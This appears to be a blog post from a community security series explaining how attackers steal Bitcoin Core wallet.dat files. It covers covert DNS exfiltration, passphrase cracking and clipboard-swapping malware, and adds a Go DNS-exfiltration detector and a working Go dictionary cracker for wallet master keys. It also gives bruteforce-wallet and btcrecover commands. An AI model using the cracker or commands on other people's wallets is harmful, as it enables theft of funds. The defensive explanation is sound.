In the first part I wrote a general overview of cryptocoin wallets. This time we take a closer look at the software wallet.
Software wallet
A cryptocoin wallet is different from a normal wallet, because it does not actually contain your coins. The coins exist on the blockchain. What the wallet does contain are the digital keys: the public keys from which your cryptocoin addresses are derived, and the private keys used to sign transactions. The private keys are what you need to control an address and spend its funds; whoever has them has the coins.
A software wallet consists of several components. The details differ from coin to coin, but when you install a software wallet you will find the following files in a directory named after the coin. For Bitcoin Core that directory is:
C:\Documents and Settings\YourUserName\Application data\Bitcoin (XP)
C:\Users\YourUserName\Appdata\Roaming\Bitcoin (Vista and later)
~/.bitcoin/ (linux)
~/Library/Application Support/Bitcoin/ (Mac)
There you will find files such as bitcoin.conf (configuration), peers.dat (peer connection info), debug.log and of course wallet.dat. You will also find directories with files like blk*.dat (blockchain data). An attacker is interested in wallet.dat, because that is where the keys are stored.
Malware
One of the easiest ways to get bitcoins is to write malware. It would not be wise to advertise how to do it, but you can imagine that a file with malicious code will do the trick.
First the malware searches for wallet.dat; to be efficient it targets the known directories I showed you earlier. When the file is located it is sent out over a covert channel, that is, over a communication channel that already exists and is expected on the network. It is not difficult to hide traffic inside normal traffic such as HTTP or HTTPS, but also DNS.
So now your wallet.dat is uploaded to a server and in the hands of the bad guys. If you did not encrypt your wallet with a passphrase you are a very easy target: the private keys in the file can be read directly.
If you did use a passphrase, the attacker needs time to brute-force it. There are tools that do that for him.
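The DNS variant of that covert channel is the one a defender can most easily spot, because the stolen file has to travel as query names: chunks of wallet.dat are encoded (typically hex or base32) into long subdomain labels under a domain the attacker controls, and the resolver logs keep a record of every one of them. What follows is an added example, not code from the original post, of the detection logic a blue team would run over such logs, written in Go. The log lines and the domain drop.example are constructed for the example; the log format "<time> <client> <qname>", the two-label zone split and the thresholds are assumptions, not a standard.

```go
package main

import (
	"fmt"
	"math"
	"sort"
	"strings"
)

// sampleLog is a constructed resolver log (not captured traffic), one query per
// line as "<time> <client> <qname>". The first lines are ordinary lookups; the
// last three carry hex-encoded file chunks as labels under drop.example.
var sampleLog = []string{
	"10:00:01 10.0.0.5 www.example.com",
	"10:00:02 10.0.0.5 mail.example.com",
	"10:00:03 10.0.0.5 api.github.com",
	"10:00:04 10.0.0.5 d1abc2.cloudfront.net",
	"10:00:05 10.0.0.5 login.microsoftonline.com",
	"10:00:06 10.0.0.5 9f86d081884c7d659a2feaa0c55ad015.a3bf4f1b2b0b822cd15d6c15b0f00a08.0.drop.example",
	"10:00:07 10.0.0.5 2cf24dba5fb0a30e26e83b2ac5b9e29e.1b161e5c1fa7425e73043362938b9824.1.drop.example",
	"10:00:08 10.0.0.5 e3b0c44298fc1c149afbf4c8996fb924.27ae41e4649b934ca495991b7852b855.2.drop.example",
}

// Thresholds are starting points for tuning, not measured values.
const (
	maxBenignSubLen  = 40  // subdomain part longer than this is unusual for humans
	minExfilEntropy  = 3.0 // bits per character; encoded data scores well above this
	maxBenignUniques = 10  // more distinct subdomains than this in one log window
)

// ZoneStats accumulates the evidence for one zone (registrable domain).
type ZoneStats struct {
	Queries    int
	UniqueSubs map[string]bool
	MaxSubLen  int
	MaxEntropy float64
}

// entropy returns the Shannon entropy of s in bits per character.
func entropy(s string) float64 {
	counts := map[rune]int{}
	for _, r := range s {
		counts[r]++
	}
	n := float64(len([]rune(s)))
	h := 0.0
	for _, c := range counts {
		p := float64(c) / n
		h -= p * math.Log2(p)
	}
	return h
}

// splitZone treats the last two labels as the zone and everything before them
// as the subdomain. This is an assumption that fails for suffixes like co.uk;
// production tooling should use the public suffix list instead.
func splitZone(qname string) (zone, sub string) {
	labels := strings.Split(strings.TrimSuffix(strings.ToLower(qname), "."), ".")
	if len(labels) <= 2 {
		return strings.Join(labels, "."), ""
	}
	return strings.Join(labels[len(labels)-2:], "."), strings.Join(labels[:len(labels)-2], ".")
}

// analyze folds every query into per-zone statistics; malformed lines are skipped.
func analyze(lines []string) map[string]*ZoneStats {
	stats := map[string]*ZoneStats{}
	for _, line := range lines {
		fields := strings.Fields(line)
		if len(fields) < 3 {
			continue
		}
		zone, sub := splitZone(fields[2])
		st := stats[zone]
		if st == nil {
			st = &ZoneStats{UniqueSubs: map[string]bool{}}
			stats[zone] = st
		}
		st.Queries++
		st.UniqueSubs[sub] = true
		if len(sub) > st.MaxSubLen {
			st.MaxSubLen = len(sub)
		}
		if e := entropy(sub); e > st.MaxEntropy {
			st.MaxEntropy = e
		}
	}
	return stats
}

// reasons lists why a zone looks like a covert channel; empty means benign.
func reasons(st *ZoneStats) []string {
	var r []string
	if st.MaxSubLen >= maxBenignSubLen && st.MaxEntropy >= minExfilEntropy {
		r = append(r, fmt.Sprintf("long high-entropy labels (len %d, %.2f bits/char)", st.MaxSubLen, st.MaxEntropy))
	}
	if len(st.UniqueSubs) > maxBenignUniques {
		r = append(r, fmt.Sprintf("%d distinct subdomains", len(st.UniqueSubs)))
	}
	return r
}

// flaggedZones returns the suspicious zones in sorted order.
func flaggedZones(stats map[string]*ZoneStats) []string {
	var out []string
	for zone, st := range stats {
		if len(reasons(st)) > 0 {
			out = append(out, zone)
		}
	}
	sort.Strings(out)
	return out
}

func main() {
	stats := analyze(sampleLog)
	for _, zone := range flaggedZones(stats) {
		fmt.Printf("%s: %s\n", zone, strings.Join(reasons(stats[zone]), "; "))
	}
}
```

Run against the constructed log, only drop.example is reported. The two rules are complementary: the length-plus-entropy rule catches a few fat queries, the distinct-subdomain rule catches a tunnel that keeps each label short but sends thousands of them. Both will need tuning against your own baseline, since CDN and anti-spam lookups also produce odd-looking names.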
Getting the password
There is a tool named bruteforce-wallet. It can be used in two ways: try all possible passwords built from a character set, or try all passwords listed in a file. There are very good files with the most commonly used passwords, which speeds up the attack considerably, so a password like P@SSw0rd2016 is easy. The command for a dictionary attack with 6 threads is:
bruteforce-wallet -t 6 -f dictionary.txt wallet.dat
But if the attacker has some knowledge about you, he could also use a tool like btcrecover, in which you specify the words or numbers you think the victim uses.
The attacker puts those words in a token list. Btcrecover then tries all possible combinations of one or more of these tokens, and it can also vary how a word is spelled or capitalized.
C:\python27\python btcrecover.py --wallet wallet.dat --tokenlist tokens.txt
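Both tools do the same thing in their inner loop, and it is worth seeing it once to understand what the passphrase and the wallet's iteration count actually buy you. The following is an added example, not code from the post and not from bruteforce-wallet or btcrecover, written in Go because its standard library has SHA-512 and AES. It parses the value of Bitcoin Core's mkey record (the encrypted wallet master key, its salt and the iteration count), stretches each candidate passphrase the way Bitcoin Core does, and accepts a candidate only if the AES-CBC decryption ends in valid padding. Reading that record out of the Berkeley DB file is not shown; the function takes the record's value bytes. The sample record, passphrase, salt and the iteration count of 2000 (real wallets use at least 25000) are constructed inside the program so it runs offline.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha512"
	"encoding/binary"
	"errors"
)

// MasterKey mirrors Bitcoin Core's CMasterKey ("mkey") record in wallet.dat: the
// 32-byte master key under AES-256-CBC (48 bytes with PKCS#7 padding), the salt,
// and the passphrase-stretching parameters.
type MasterKey struct {
	Encrypted  []byte // 48 bytes
	Salt       []byte // 8 bytes
	Method     uint32 // 0 = SHA-512 based derivation, the only method in use
	Iterations uint32 // nDeriveIterations; real wallets use at least 25000
}

// parseMasterKey decodes the value bytes of the mkey record. A wallet.dat with
// no mkey record at all is unencrypted: its private keys can be read directly.
// Like btcrecover, it assumes the 48/8-byte sizes Bitcoin Core always writes.
func parseMasterKey(v []byte) (mk MasterKey, err error) {
	// layout: 0x30 + key, 0x08 + salt, uint32 method, uint32 iterations, 0x00
	if len(v) < 67 || v[0] != 48 || v[49] != 8 {
		return mk, errors.New("not a CMasterKey record with 48-byte key and 8-byte salt")
	}
	mk.Encrypted, mk.Salt = v[1:49], v[50:58]
	mk.Method = binary.LittleEndian.Uint32(v[58:62])
	mk.Iterations = binary.LittleEndian.Uint32(v[62:66])
	return mk, nil
}

// deriveKeyIV is Bitcoin Core's passphrase stretching (OpenSSL EVP_BytesToKey
// with SHA-512): hash passphrase||salt, then re-hash the digest iterations-1
// more times. Bytes 0..31 become the AES key, bytes 32..47 the CBC IV.
func deriveKeyIV(passphrase string, salt []byte, iterations uint32) (key, iv []byte) {
	d := sha512.Sum512(append([]byte(passphrase), salt...))
	for i := uint32(1); i < iterations; i++ {
		d = sha512.Sum512(d[:])
	}
	return d[:32], d[32:48]
}

// tryPassphrase decrypts the master key with one candidate. Only the right
// passphrase yields 32 key bytes followed by a full block of 0x10 padding.
func tryPassphrase(mk MasterKey, passphrase string) (master []byte, ok bool) {
	key, iv := deriveKeyIV(passphrase, mk.Salt, mk.Iterations)
	block, err := aes.NewCipher(key)
	if err != nil || len(mk.Encrypted) != 48 {
		return nil, false
	}
	plain := make([]byte, 48)
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(plain, mk.Encrypted)
	if !bytes.Equal(plain[32:], bytes.Repeat([]byte{0x10}, 16)) {
		return nil, false
	}
	return plain[:32], true
}

// crackWallet is the dictionary loop behind "bruteforce-wallet -f": each candidate
// costs a full derivation, so iteration count and passphrase quality set the cost.
func crackWallet(mk MasterKey, candidates []string) (string, bool) {
	for _, c := range candidates {
		if _, ok := tryPassphrase(mk, c); ok {
			return c, true
		}
	}
	return "", false
}

// Constructed sample, not a real wallet.dat: sampleMasterKeyRecord serializes a
// CMasterKey the way Bitcoin Core does, with a low iteration count for speed.
var (
	sampleMaster     = []byte("0123456789abcdef0123456789abcdef") // 32 bytes
	sampleSalt       = []byte{1, 2, 3, 4, 5, 6, 7, 8}
	samplePassphrase = "P@SSw0rd2016"
	sampleIterations = uint32(2000)
)

func sampleMasterKeyRecord() []byte {
	key, iv := deriveKeyIV(samplePassphrase, sampleSalt, sampleIterations)
	block, _ := aes.NewCipher(key)
	padded := append(append([]byte{}, sampleMaster...), bytes.Repeat([]byte{0x10}, 16)...)
	enc := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(enc, padded)
	params := make([]byte, 8) // nDerivationMethod = 0, then nDeriveIterations
	binary.LittleEndian.PutUint32(params[4:], sampleIterations)
	rec := append([]byte{byte(len(enc))}, enc...)
	rec = append(append(rec, byte(len(sampleSalt))), sampleSalt...)
	rec = append(rec, params...)
	return append(rec, 0) // empty vchOtherDerivationParameters
}
```

Calling crackWallet with a word list that contains P@SSw0rd2016 returns that passphrase; a case variation such as p@ssw0rd2016 fails the padding check and is rejected. The cost per guess is one SHA-512 chain of Iterations steps plus one AES decryption, so a wallet encrypted with 100000 iterations makes every guess four times as expensive as the sample and a long random passphrase pushes the number of guesses out of reach, whereas a dictionary word falls in seconds regardless of the iteration count.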
But if you have already written the malware, why not add a keylogger to it, so you do not have to crack anything at all.
Tricking you
There are also other ways to steal coins from your PC. Why would you as an attacker take the risk of running a server to store the wallet.dat and/or the key logs? It can be traced back to you if you are not careful. So instead, write malware that detects when you copy a bitcoin (or other coin) address to the clipboard and simply replaces it with the attacker's address. You will probably not notice, and your coins are on their way to the thief. Always compare the entire pasted address with the one you intended, not just the first few characters, before you confirm a transaction.
Social engineering
As with most hacks, the technical side is not the primary problem; it is the user. Why look for a hole when you can mislead the user into installing malware?
One of the big hacks on an exchange was possible by targeting key employees with social engineering. To be exact, personal information was used to trick them: the attackers used Skype and email to communicate with employees and distributed files containing malware that appealed to their personal interests.
Cryptocoins are beautiful, but not without risk.
Author's Note: The Life Explorer Series is a community magazine that brings together writers to post about a variety of topics. All topics and authors using the #lifeexplorer tag or title are part of this group and have permission to post under the heading Life Explorer. If you would like to write with the Life Explorer series about a topic, reach out and get in chat contact with @timsaid to learn more.
Make sure to catch all these Life Explorer authors:
@prufarchy
@yogi.artist
@timsaid
And if you've missed the previous edition, check out the first Life Explorer post: https://steemit.com/security/@disofdis/life-explorers-security-cryptocoin-wallets-part-1-introduction-to-cryptocoins-wallets